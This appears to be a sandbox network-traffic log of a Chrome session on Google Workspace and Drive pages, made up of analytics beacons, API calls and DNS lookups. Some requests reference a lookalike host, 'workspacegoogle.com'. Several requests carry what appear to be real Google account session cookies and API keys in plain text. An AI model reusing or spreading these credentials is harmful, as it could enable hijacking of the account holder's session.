1280x672&ep.is_rivendell=true&ep.is_eea=false&tfd=1881

chrome.exe

Remote address:

216.239.34.36:443

Request

POST /g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791373704&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1332354461.1736791375&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=14.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=1&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791374&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=page_view&_fv=1&_nsi=1&_ss=1&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&ep.is_eea=false&tfd=1881 HTTP/2.0
host: region1.google-analytics.com
content-length: 0
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://workspace.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
POST

https://region1.google-analytics.com/g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791373704&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1332354461.1736791375&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=14.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=2&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791374&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=auto_track_event&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&ep.is_eea=false&ep.event_category=drive%3A%20global%20nav&ep.event_action=sign%20in&ep.event_label=https%3A%2F%2Fdrive.google.com%2Fdrive%2F%3Fdmr%3D1%26ec%3Dwgc-drive-globalnav-goto&ep.data_g_metadata=na&_et=1476&tfd=3359

chrome.exe

Remote address:

216.239.34.36:443

Request

POST /g/collect?v=2&tid=G-FWCBRW1RY8&gtm=45je5190v886057375z8595350za200zb595350&_p=1736791373704&gcs=G101&gcd=13q3r3l3l5l1&npa=0&dma=0&tag_exp=101925629~102067555~102067808~102081485~102198178&ul=en&cid=1332354461.1736791375&sr=1280x720&_ng=1&ir=1&uaa=x86&uab=64&uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123&uamb=0&uam=&uap=Windows&uapv=14.0.0&uaw=0&frm=0&pscdl=denied&_eu=EA&_s=2&dl=https%3A%2F%2Fworkspacegoogle.com%2Fus%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&dp=us%3A%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&sid=1736791374&sct=1&seg=0&dt=Google%20Drive%3A%20Share%20Files%20Online%20with%20Secure%20Cloud%20Storage%20%7C%20Google%20Workspace&en=auto_track_event&_c=1&ep.region=noram&ep.original_url=workspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F&ep.cs_employee_count=&ep.concatenated_exids=(not%20set)&ep.apps_marketing_signals_cookie=source%3D%26lastExperiment%3D%26allExperiments%3D&ep.cs_industry=&ep.cs_formid=33&ep.locale=en_us&ep.resolution=1280x672&ep.is_rivendell=true&ep.is_eea=false&ep.event_category=drive%3A%20global%20nav&ep.event_action=sign%20in&ep.event_label=https%3A%2F%2Fdrive.google.com%2Fdrive%2F%3Fdmr%3D1%26ec%3Dwgc-drive-globalnav-goto&ep.data_g_metadata=na&_et=1476&tfd=3359 HTTP/2.0
host: region1.google-analytics.com
content-length: 0
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://workspace.google.com
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: empty
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
GET

https://apis.google.com/js/client.js

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /js/client.js HTTP/2.0
host: apis.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
GET

https://apis.google.com/_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs

chrome.exe

Remote address:

142.250.178.14:443

Request

GET /_/scs/abc-static/_/js/k=gapi.lb.en.5oZHy0SiJxw.O/m=client/rt=j/sv=1/d=1/ed=1/rs=AHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA/cb=gapi.loaded_0?le=scs HTTP/2.0
host: apis.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw
DNS

feedback-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

feedback-pa.clients6.google.com

IN A

Response

feedback-pa.clients6.google.com

IN A

142.250.200.10
DNS

feedback-pa.clients6.google.com

firefox.exe

Remote address:

8.8.8.8:53

Request

feedback-pa.clients6.google.com

IN A

Response

feedback-pa.clients6.google.com

IN A

142.250.200.10
GET

https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__

chrome.exe

Remote address:

142.250.200.10:443

Request

GET /static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__ HTTP/2.0
host: feedback-pa.clients6.google.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
upgrade-insecure-requests: 1
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: navigate
sec-fetch-dest: iframe
referer: https://workspace.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw

Response

HTTP/2.0 200

content-type: application/json+protobuf; charset=UTF-8
strict-transport-security: max-age=10886400; includeSubdomains
vary: Origin
vary: X-Origin
vary: Referer
vary: Referer
date: Mon, 13 Jan 2025 18:02:56 GMT
content-type: application/json+protobuf; charset=UTF-8
content-length: 25
vary: Origin
x-frame-options: SAMEORIGIN
vary: X-Origin
vary: Referer
POST

https://feedback-pa.clients6.google.com/v1/survey/startup_config?key=AIzaSyCB6OnnfuitFnaYWu4BvtGKaoLFk4cm-GE

chrome.exe

Remote address:

142.250.200.10:443

Request

POST /v1/survey/startup_config?key=AIzaSyCB6OnnfuitFnaYWu4BvtGKaoLFk4cm-GE HTTP/2.0
host: feedback-pa.clients6.google.com
content-length: 18
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
x-goog-encode-response-if-executable: base64
x-origin: https://workspace.google.com
x-clientdetails: appVersion=5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F123.0.0.0%20Safari%2F537.36&platform=Win32&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F123.0.0.0%20Safari%2F537.36
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
content-type: application/json+protobuf
x-goog-api-key: AIzaSyCB6OnnfuitFnaYWu4BvtGKaoLFk4cm-GE
x-requested-with: XMLHttpRequest
x-javascript-user-agent: google-api-javascript-client/1.1.0
x-referer: https://workspace.google.com
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://feedback-pa.clients6.google.com
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw

Response

HTTP/2.0 200

content-type: application/json+protobuf; charset=UTF-8
strict-transport-security: max-age=10886400; includeSubdomains
vary: Origin
vary: X-Origin
vary: Referer
strict-transport-security: max-age=10886400; includeSubdomains
date: Mon, 13 Jan 2025 18:02:56 GMT
vary: Origin
content-length: 25
vary: Referer
x-frame-options: SAMEORIGIN
content-length: 25
x-frame-options: SAMEORIGIN
POST

https://feedback-pa.clients6.google.com/v1/survey/trigger/trigger_anonymous?key=AIzaSyD3LJeW4Q6gtdgJlyeFZUp-GhpIoc6EUeg

chrome.exe

Remote address:

142.250.200.10:443

Request

POST /v1/survey/trigger/trigger_anonymous?key=AIzaSyD3LJeW4Q6gtdgJlyeFZUp-GhpIoc6EUeg HTTP/2.0
host: feedback-pa.clients6.google.com
content-length: 86
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
x-goog-encode-response-if-executable: base64
x-origin: https://workspace.google.com
x-clientdetails: appVersion=5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F123.0.0.0%20Safari%2F537.36&platform=Win32&userAgent=Mozilla%2F5.0%20(Windows%20NT%2010.0%3B%20Win64%3B%20x64)%20AppleWebKit%2F537.36%20(KHTML%2C%20like%20Gecko)%20Chrome%2F123.0.0.0%20Safari%2F537.36
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
content-type: application/json+protobuf
x-goog-api-key: AIzaSyD3LJeW4Q6gtdgJlyeFZUp-GhpIoc6EUeg
x-requested-with: XMLHttpRequest
x-javascript-user-agent: google-api-javascript-client/1.1.0
x-referer: https://workspace.google.com
sec-ch-ua-platform: "Windows"
accept: */*
origin: https://feedback-pa.clients6.google.com
x-client-data: CJ/1ygE=
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://feedback-pa.clients6.google.com/static/proxy.html?usegapi=1&jsh=m%3B%2F_%2Fscs%2Fabc-static%2F_%2Fjs%2Fk%3Dgapi.lb.en.5oZHy0SiJxw.O%2Fd%3D1%2Frs%3DAHpOoo-Hry6DG-RE4t9kNz_t6hiwmwXOmA%2Fm%3D__features__
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: __Secure-ENID=22.SE=RY3NxmeSUWFAGXw0CK4M-kJClbzqr1OJiGu3-HkBOjdQEChJXhkNGNLB7uMGkdRJ09Qb9qVDMoU7I-oKvnoqwH2MqiPMRhAlMYjFOHhsxnDkJXApmb3doMauNfsq0eBMzEeVzY72TXVLKDY_OidUj3YuapXTl7qKDvAsuSzOUWyXqSux1ZVgeBOyZ7hYvigfvXg
cookie: NID=520=iCyl-j20yVoCF3gHwVhEKXIzfMV2EaTqxsu9noG-Ci9bGEcFgp635B8xfVjS6PkmGzFD3CRNtcap3Kc43EOF0BsO1e3Inb4mfVUHTiioiQcYB0bs3YJLeIcaXhNrVhRD5kYrgh_bieE-2655UZVaAZgVbnipwe6SxHYgnAWFWghpxZ7tT22_oKFEHw

Response

HTTP/2.0 200

content-type: application/json+protobuf; charset=UTF-8
strict-transport-security: max-age=10886400; includeSubdomains
vary: Origin
vary: X-Origin
vary: Referer
strict-transport-security: max-age=10886400; includeSubdomains
date: Mon, 13 Jan 2025 18:02:56 GMT
vary: Origin
content-length: 25
vary: Referer
x-frame-options: SAMEORIGIN
content-length: 25
x-frame-options: SAMEORIGIN
POST

https://people-pa.clients6.google.com/batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Dkjbcmgb8d2wd%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8

chrome.exe

Remote address:

142.250.200.10:443

Response

HTTP/2.0 200

content-type: application/json+protobuf; charset=UTF-8
strict-transport-security: max-age=10886400; includeSubdomains
vary: Origin
vary: X-Origin
vary: Referer
strict-transport-security: max-age=10886400; includeSubdomains
date: Mon, 13 Jan 2025 18:02:56 GMT
vary: Origin
content-length: 25
vary: Referer
x-frame-options: SAMEORIGIN
content-length: 25
x-frame-options: SAMEORIGIN

Request

POST /batch?%24ct=multipart%2Fmixed%3B%20boundary%3D%22%3D%3D%3D%3D%3Dkjbcmgb8d2wd%3D%3D%3D%3D%3D%22&key=AIzaSyD_InbmSFufIEps5UAt2NmB_3LvBH3Sz_8 HTTP/2.0
host: people-pa.clients6.google.com
content-length: 835
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-platform: "Windows"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
content-type: text/plain; charset=UTF-8
accept: */*
origin: https://drive.google.com
x-client-data: CJ/1ygE=
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
cookie: HSID=AbQk1Uh8DGBGRT8zI
cookie: __Secure-1PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKpPdAR-6pXNGU8_8b3ghl4gACgYKAQcSARQSFQHGX2MiuzFwzoGVZjf9XiL_gv-yGBoVAUF8yKpXe45Ghwkqa8cshj6z4NA90076
cookie: __Secure-3PSID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKjZzboFCsHoQqO6iUSQTb5QACgYKAc0SARQSFQHGX2MifVN2I4xFE0lp3BrkZ53u0hoVAUF8yKprMUakDM16Jcy0IiXUuTID0076
cookie: SID=g.a000sQhvJAWmQ4mN-vmCBq4G_oBT3b0-klqHlCxVEnYdWCXs0soKh52HeyfeZmX7z4rNvRmNRgACgYKAQMSARQSFQHGX2MivN7-_rR5SYuFBuS5X1TOLxoVAUF8yKpmCLTsnkUgVLOwvkjiKMtj0076
cookie: SSID=AQ4ySoJv7rKL3xBzT
cookie: APISID=LOPQUe7mvd0koWrH/AJWZLZntk8bZ1mG8T
cookie: SAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-1PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: __Secure-3PAPISID=QAcUORiRRhqwdnPG/AahU9sLt6XJSjxBMe
cookie: NID=520=UMTlyC0IQYjviE7RuSacYLbIFp4Tw6mmHTl1vwit0u772LgiP5oB5w7tNME2ir9q6M2D44za9DXaSRyXRvgJ9fzvFo-yn037_-_dHCiMnfZ7iTaNKxfNZm84gAnegQjeOdWXWbSk9kKL4xGjQDllYXuxR_g_PyOOxTMYhSK7h3C7atdIsCv1NRH_af-0oQ0StpEXSCLPa25hjEgI6veClFyDqviyKI3Emhj5oqpxn9RbO4QLkxUwbVNGEQEXjRMMyEJ09zb2jMGFsuDDpbP6k6-UDQN7-4jPqWdXQYeAK5s5rOdFii58IIizghRI0HTeRcBZ4SIPJMo9yEpwJdnLLSpT-cw30t2nOw3H04qp9YAHkYtn4o3ZxbidS6CiGTrG0ckDRBUT4NnZ7ZShhHKP-c7qmhVD70Z1iaHZN0FBmG2BOQoIIgfhjA7nNz9IUYhtQNsraTEjWo3BkE6ISHybgatM1jmHyM6gi98FQ3TjjxKdBF09fqoMxxcxNBcYcDrpE0NTYsIwFag7jyEWroTnCfjkJl7bF2qkuBN1d2Xwe8uVZyylyh-d5CCPwzig7_7VuiAlZbUTwMNdCI5vtomY_LJ1_nxu9vglmpbfeCYTDzyKJCrCUyLuwO900dFR330ewy-iJTgPnxnjfo_tZ2yVmO7rsPk9y6nKWvWsYEa6503WYD31RhjCvkEM9A
cookie: __Secure-ENID=25.SE=Xp-w7VNhDkuVPYBEZFe3duusIn6u5MHnTgUbjSHhQjwSeiKWre7UAUKxSe3out-CaH59KQDguk0FT0SYtiSPFtO3Cc_voMEoxkuzVl7chnXc_rTpmMtzNmr1Sav2rncoRJtBlYgcAxFa0NV3wwIcF5ATefsnmioozhwF9wRxzQ192VKHBYGSLuRbZfQuG3mOKDsUZ9EZOdLfNElFDw
cookie: SIDCC=AKEyXzWIUIp3At3QgIPN9o3XEo-rlfqGNpLc6lyM6SzHljWoFruuWzJdjGVkO0eVs3-NqUcvkg
cookie: __Secure-1PSIDCC=AKEyXzWK41DUBZms7Cieovo715zxpd90nKmZij4mVQ7glVLa_PSBKXqskzkgi5VbteCwhHRw
cookie: __Secure-3PSIDCC=AKEyXzWDb75Chzu0cqBWR9BxlBRaw74jMxJjXGfqtro2mO4T4nIo0J4_5Rc7tZ4RWOCqotcFoA
GET

https://youtube.googleapis.com/iframe_api

chrome.exe

Remote address:

142.250.200.10:443

Request

GET /iframe_api HTTP/2.0
host: youtube.googleapis.com
sec-ch-ua: "Google Chrome";v="123", "Not:A-Brand";v="8", "Chromium";v="123"
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
sec-ch-ua-platform: "Windows"
accept: */*
x-client-data: CJ/1ygE=
sec-fetch-site: cross-site
sec-fetch-mode: no-cors
sec-fetch-dest: script
referer: https://drive.google.com/
accept-encoding: gzip, deflate, br, zstd
accept-language: en-US,en;q=0.9
DNS

14.200.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

14.200.250.142.in-addr.arpa

IN PTR

Response

14.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f141e100net
DNS

ade.googlesyndication.com

NetworkService

Remote address:

8.8.8.8:53

Request

ade.googlesyndication.com

IN A

Response

ade.googlesyndication.com

IN A

216.58.204.66
DNS

ade.googlesyndication.com

NetworkService

Remote address:

8.8.8.8:53

Request

ade.googlesyndication.com

IN A
DNS

14.178.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

14.178.250.142.in-addr.arpa

IN PTR

Response

14.178.250.142.in-addr.arpa

IN PTR

lhr48s27-in-f141e100net
DNS

66.204.58.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

66.204.58.216.in-addr.arpa

IN PTR

Response

66.204.58.216.in-addr.arpa

IN PTR

lhr48s49-in-f21e100net

66.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f2�G

66.204.58.216.in-addr.arpa

IN PTR

lhr25s13-in-f66�G
DNS

ssl.gstatic.com

NetworkService

Remote address:

8.8.8.8:53

Request

ssl.gstatic.com

IN A

Response

ssl.gstatic.com

IN A

142.250.200.3
DNS

drive-thirdparty.googleusercontent.com

NetworkService

Remote address:

8.8.8.8:53

Request

drive-thirdparty.googleusercontent.com

IN A

Response

drive-thirdparty.googleusercontent.com

IN CNAME

googlehosted.l.googleusercontent.com

googlehosted.l.googleusercontent.com

IN A

142.250.200.33
DNS

94.1.102.66.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

94.1.102.66.in-addr.arpa

IN PTR

Response

94.1.102.66.in-addr.arpa

IN PTR

wb-in-f941e100net
DNS

clients6.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

clients6.google.com

IN A

Response

clients6.google.com

IN CNAME

clients.l.google.com

clients.l.google.com

IN A

142.250.187.238
DNS

waa-pa.clients6.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN A

Response

waa-pa.clients6.google.com

IN A

142.250.187.202
DNS

waa-pa.clients6.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

waa-pa.clients6.google.com

IN A

Response

waa-pa.clients6.google.com

IN A

142.250.180.10
DNS

36.34.239.216.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

36.34.239.216.in-addr.arpa

IN PTR

Response
DNS

accounts.youtube.com

NetworkService

Remote address:

8.8.8.8:53

Request

accounts.youtube.com

IN A

Response

accounts.youtube.com

IN CNAME

www3.l.google.com

www3.l.google.com

IN A

142.250.178.14
DNS

238.179.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

238.179.250.142.in-addr.arpa

IN PTR

Response

238.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f141e100net
DNS

238.179.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

238.179.250.142.in-addr.arpa

IN PTR

Response

238.179.250.142.in-addr.arpa

IN PTR

lhr25s31-in-f141e100net
DNS

10.200.250.142.in-addr.arpa

NetworkService

Remote address:

8.8.8.8:53

Request

10.200.250.142.in-addr.arpa

IN PTR

Response

10.200.250.142.in-addr.arpa

IN PTR

lhr48s29-in-f101e100net
DNS

play.google.com

NetworkService

Remote address:

8.8.8.8:53

Request

play.google.com

IN A

Response

play.google.com

IN A

142.250.179.238
DNS

accounts.google.co.uk

NetworkService

Remote address:

8.8.8.8:53

Request

accounts.google.co.uk

IN A

Response

accounts.google.co.uk

IN CNAME

accounts-cctld.l.google.com

accounts-cctld.l.google.com

IN A

66.102.1.94
DNS

accounts.google.co.uk

NetworkService

Remote address:

8.8.8.8:53

Request

accounts.google.co.uk

IN A

Response

accounts.google.co.uk

IN CNAME

accounts-cctld.l.google.com

accounts-cctld.l.google.com

IN A

66.102.1.94
GET

https://ade.googlesyndication.com/ddm/activity/src=2507573;type=googl003;cat=fl-gw008;ord=1;num=1640181783109;npa=0;uaa=x86;uab=64;uafvl=Google%2520Chrome%3B123.0.6312.123%7CNot%253AA-Brand%3B8.0.0.0%7CChromium%3B123.0.6312.123;uamb=0;uam=;uap=Windows;uapv=14.0.0;uaw=0;pscdl=denied;frm=0;gtm=45fe5190v9181638614z8595350za201zb595350;gcs=G101;gcd=13q3r3l3l5l1;dma=0;tag_exp=101925629~102067555~102067808~102081485~102198178;epver=2;~oref=https%3A%2F%2Fworkspace.google.com%2Fintl%2Fen-US%2Fproducts%2Fdrive%2F?

chrome.exe

Remote address:

216.58.204.66:443

Request

